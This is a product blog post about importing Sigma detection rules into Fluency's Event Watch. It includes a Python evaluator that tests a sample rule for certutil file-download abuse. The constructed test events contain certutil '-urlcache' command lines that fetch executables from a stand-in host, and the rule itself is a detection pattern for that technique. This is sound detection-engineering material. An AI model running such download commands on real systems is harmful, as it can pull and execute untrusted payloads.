Sigma Rule Support in Fluency
Updated: Feb 19, 2022
With the rollout of Fluency v7.1, we have added initial Sigma rule support. This support gives users the ability to directly import Sigma rules into Fluency’s Event Watch system. Users can now import their favorite rules from repositories such as the SigmaHQ repository at https://github.com/SigmaHQ/sigma (not associated with Fluency).
Importing Sigma rules is a simple procedure.
After navigating to the Event Watch page, users will notice a new import option at the top of the page.
Click this button to open the import dialog.
Copy and paste the Sigma rule to be imported into the text area on the left of the dialog. In this example we are importing a rule from the SigmaHQ repository. For any third-party rule, check the license that ships with its repository and comply with any requirements it imposes before using the rule.
Once the rule has been pasted, users will notice three buttons at the bottom left. These buttons give the user the ability to view the proposed translation, import the rule immediately, or cancel the operation.
Clicking the Translate button will give the user several views into the translated rule on the right.
The initial translation view (the first radio button) shows how the resulting Event Watch rule looks in its native JSON format.
The second radio button shows how the translated query itself looks (this query can later be copied and pasted between the Event Watch and Event Search pages).
The third radio button shows the visual representation of the LVDB query tree that is used for both Event Watch and Event Search.
Using these views, the user can check that the translation matches the intent of the rule and adjust the Sigma rule if needed before importing it.
Import Sigma Rule
Once satisfied (or to immediately import the Sigma rule), click the Import button.
Doing so will import the Sigma rule, translating it into a Fluency query and creating a basic Event Watch behavior. At this point, the user needs only continue filling out the Event Watch behavior page as is normally done when creating a new behavior.
Note that one difference between a typical behavior and an imported Sigma rule is that the Selection Criteria uses an LVDB (LavaDB) query instead of the usual behavior query. This is part of the more robust query system that was implemented to support Sigma rules.
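Whatever query language a translator emits, it has to preserve the semantics of the Sigma `detection` block: a map of fields is an AND, a list of values under one field is an OR, modifiers such as `|contains` or `|endswith` change the comparison, and the `condition` string combines named selections with `and`, `or`, `not` and parentheses. The script below is an added example, not Fluency's translator and not a SigmaHQ rule; it evaluates a constructed Sigma-style rule directly against constructed process-creation events so the expected hits and misses can be checked before the rule is imported and its LVDB translation reviewed. The rule, field names and events are all invented for the illustration.

```python
"""Minimal evaluator for a Sigma 'detection' block (added example, not Fluency code).

Supports plain values (case-insensitive, with * and ? wildcards), the
contains/startswith/endswith/all modifiers, list-as-OR, map-as-AND and a
condition grammar of identifiers, and/or/not and parentheses.
"""
import fnmatch
import re

# Constructed rule: the Python form of the YAML a Sigma rule carries.
# Hypothetical content, not a SigmaHQ rule.
RULE = {
    "title": "Example: certutil used to fetch a file",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains": ["urlcache", "-split"],   # list = OR
        },
        "filter": {"ParentImage|endswith": "\\msiexec.exe"},
        "condition": "selection and not filter",
    },
}


def _match_value(modifiers, actual, expected):
    # Sigma string comparison is case-insensitive.
    a, e = str(actual).lower(), str(expected).lower()
    if "contains" in modifiers:
        return e in a
    if "startswith" in modifiers:
        return a.startswith(e)
    if "endswith" in modifiers:
        return a.endswith(e)
    return fnmatch.fnmatchcase(a, e)      # plain value: equality with * and ? wildcards


def _field_matches(event, key, expected):
    name, *modifiers = key.split("|")
    if name not in event:
        return False
    values = expected if isinstance(expected, list) else [expected]
    hits = [_match_value(modifiers, event[name], v) for v in values]
    return all(hits) if "all" in modifiers else any(hits)


def _selection_matches(event, selection):
    # A list of maps is an OR of maps; a map is an AND of its fields.
    if isinstance(selection, list):
        return any(_selection_matches(event, s) for s in selection)
    return all(_field_matches(event, k, v) for k, v in selection.items())


_TOKEN = re.compile(r"\(|\)|[A-Za-z_][A-Za-z0-9_]*")


def evaluate_condition(condition, detection, event):
    """Recursive-descent evaluation of the condition string for one event."""
    tokens, pos = _TOKEN.findall(condition), 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def parse_or():
        value = parse_and()
        while peek() == "or":
            take()
            value = parse_and() or value       # evaluate both sides; no short-circuit
        return value

    def parse_and():
        value = parse_not()
        while peek() == "and":
            take()
            value = parse_not() and value
        return value

    def parse_not():
        if peek() == "not":
            take()
            return not parse_not()
        tok = take()
        if tok == "(":
            value = parse_or()
            if take() != ")":
                raise ValueError("unbalanced parentheses in condition")
            return value
        if tok == "condition" or tok not in detection:
            raise ValueError(f"unknown selection name: {tok}")
        return _selection_matches(event, detection[tok])

    result = parse_or()
    if pos != len(tokens):
        raise ValueError("trailing tokens in condition")
    return result


def rule_matches(rule, event):
    return evaluate_condition(rule["detection"]["condition"], rule["detection"], event)


def run_rule(rule, events):
    """Indices of the events the rule fires on."""
    return [i for i, ev in enumerate(events) if rule_matches(rule, ev)]


# Constructed process-creation events, not real telemetry.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "certutil.exe -urlcache -f http://example.invalid/a.exe a.exe"},  # fires
    {"Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": "certutil.exe -urlcache -f http://example.invalid/b.exe b.exe"},  # removed by filter
    {"Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "certutil.exe -hashfile a.exe SHA256"},                           # no download keyword
    {"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "cmd.exe /c certutil -urlcache"},                                 # Image does not match
]

if __name__ == "__main__":
    print(run_rule(RULE, EVENTS))
```

Running the rule over the four constructed events yields only the first one; the second is suppressed by the `filter` selection, which is exactly the behaviour to confirm in the translated query view before the Event Watch behavior goes live. If an edited rule fires on events it should not, or misses the sample it was written for, fix the Sigma text before importing rather than patching the generated query by hand.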
With this new feature rollout, the team at Fluency hopes that its users can make use of the plethora of available Sigma rules developed by the community to improve their security posture as needed.